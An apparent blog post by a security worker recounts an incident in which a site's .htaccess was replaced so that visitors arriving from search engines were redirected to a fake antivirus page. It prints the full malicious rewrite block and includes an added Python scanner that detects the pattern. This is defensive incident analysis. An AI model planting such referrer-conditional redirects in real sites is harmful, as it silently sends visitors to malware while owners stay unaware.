A couple of months ago I was working with a customer whose website, whenever you attempted to reach it via Google or Yahoo, redirected you to the famous Antivirus XP 2008 software. After playing around a bit in my proxy, I was able to determine that this was a "Referrer" specific problem. If you traveled to the website via the address bar, you were fine; however, if your referrer attribute was set to a major search engine domain such as Google, AOL, Ask, or Yahoo, you were automatically redirected to a malicious page.
After alerting the customer to this issue, I asked him if he could please keep me informed of what was causing this. I contacted him two days later only to hear that his hosting company had taken care of the issue and he had zero details for me regarding the compromise.
For some reason, I really liked this type of compromise. For the most part, the website owner could be completely unaware that this is occurring for months. This, to me, is a compromise that does not take full advantage, but somewhat leeches off of you like a tapeworm.
I wanted to see this issue again. So what I did was plug this into our product to attempt to detect any site that was currently redirecting only if the referrer was a site like Google or Yahoo. A month went by before I was able to see this again.
I was able to pick up on another Search Engine 302 redirect issue on the day that it was exploited. Our product detected it and I verified that it was valid. I was able to contact the customer and provide him with details about the issue, and he was willing to work with me on determining how this was occurring.
Although I did not believe that this was occurring via SQL injection or via any GET/POST request, I still requested the entire week of log files. In reviewing these log files, I did see a couple of RFI attempts, but nothing that looked successful, and from reviewing the .txt page that the RFI was calling, I did not see anything that would lead to a compromise.
I was able to track down the problem and saw that the .htaccess file was replaced and contained the following:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://maliciousdomain.com [R,L]
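A small scanner for exactly this pattern, added here as an example (it is not the author's product or any tooling from the post): it walks an .htaccess, groups each RewriteRule with the RewriteCond lines guarding it, and flags rules that test HTTP_REFERER for search engine names and redirect ([R]) to an off-site host. The sample text is the .htaccess quoted above; the own_hosts parameter and the engine list are assumptions.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import urlparse

# Constructed sample: the replaced .htaccess quoted in the post above.
SAMPLE_HTACCESS = """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://maliciousdomain.com [R,L]
"""

# Assumed list of engines worth flagging; extend as needed.
SEARCH_ENGINES = ("google", "yahoo", "msn", "aol", "ask", "altavista", "bing")

COND_RE = re.compile(r"RewriteCond\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?")
RULE_RE = re.compile(r"RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?")

def find_referrer_redirects(text: str, own_hosts: Tuple[str, ...] = ()) -> List[Dict]:
    """Return one finding per RewriteRule that is guarded by HTTP_REFERER conditions
    and redirects to an absolute URL whose host is not one of own_hosts (assumed)."""
    findings, conds = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()          # drop comments
        m = COND_RE.match(line)
        if m:
            conds.append(m.groups())                 # (testvar, pattern, flags)
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        target, raw_flags = m.group(2), (m.group(3) or "")
        flags = {f.split("=")[0].strip().upper() for f in raw_flags.split(",")}
        ref_conds = [c for c in conds if c[0] == "%{HTTP_REFERER}"]
        conds = []                                   # conditions bind only to the next rule
        host = urlparse(target).hostname
        if not ref_conds or "R" not in flags or not host or host in own_hosts:
            continue
        engines = sorted({e for _, pat, _ in ref_conds
                          for e in SEARCH_ENGINES if e in pat.lower()})
        findings.append({"line": lineno, "target": target, "engines": engines})
    return findings
```

Run it over every .htaccess under the document root on a schedule and alert on any non-empty result; a legitimate site rarely needs a referrer-conditional redirect to a host it does not own.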
So, with the review of the website, I am starting to lean toward there being an issue with the file permissions on the web server.
This site was hosted through a large hosting provider with which I have already had previous issues.
I had a compromised account come to me with an IFrame embedded on their website and all of the images deleted from the web server. When looking up the iframe on Google, I saw 20 different domains with the same iframe, all hosted by the same hosting provider. We came to the conclusion that there were probably some serious permission issues on the web server. I had the customer move to a different hosting environment and they have not experienced a compromise since. I am guessing that this site might be experiencing the same type of problem.
If you have any more information on this issue, I would love to know about it. I really enjoy working with these types of compromises because they are few and far between and, to me, seem well thought out in design.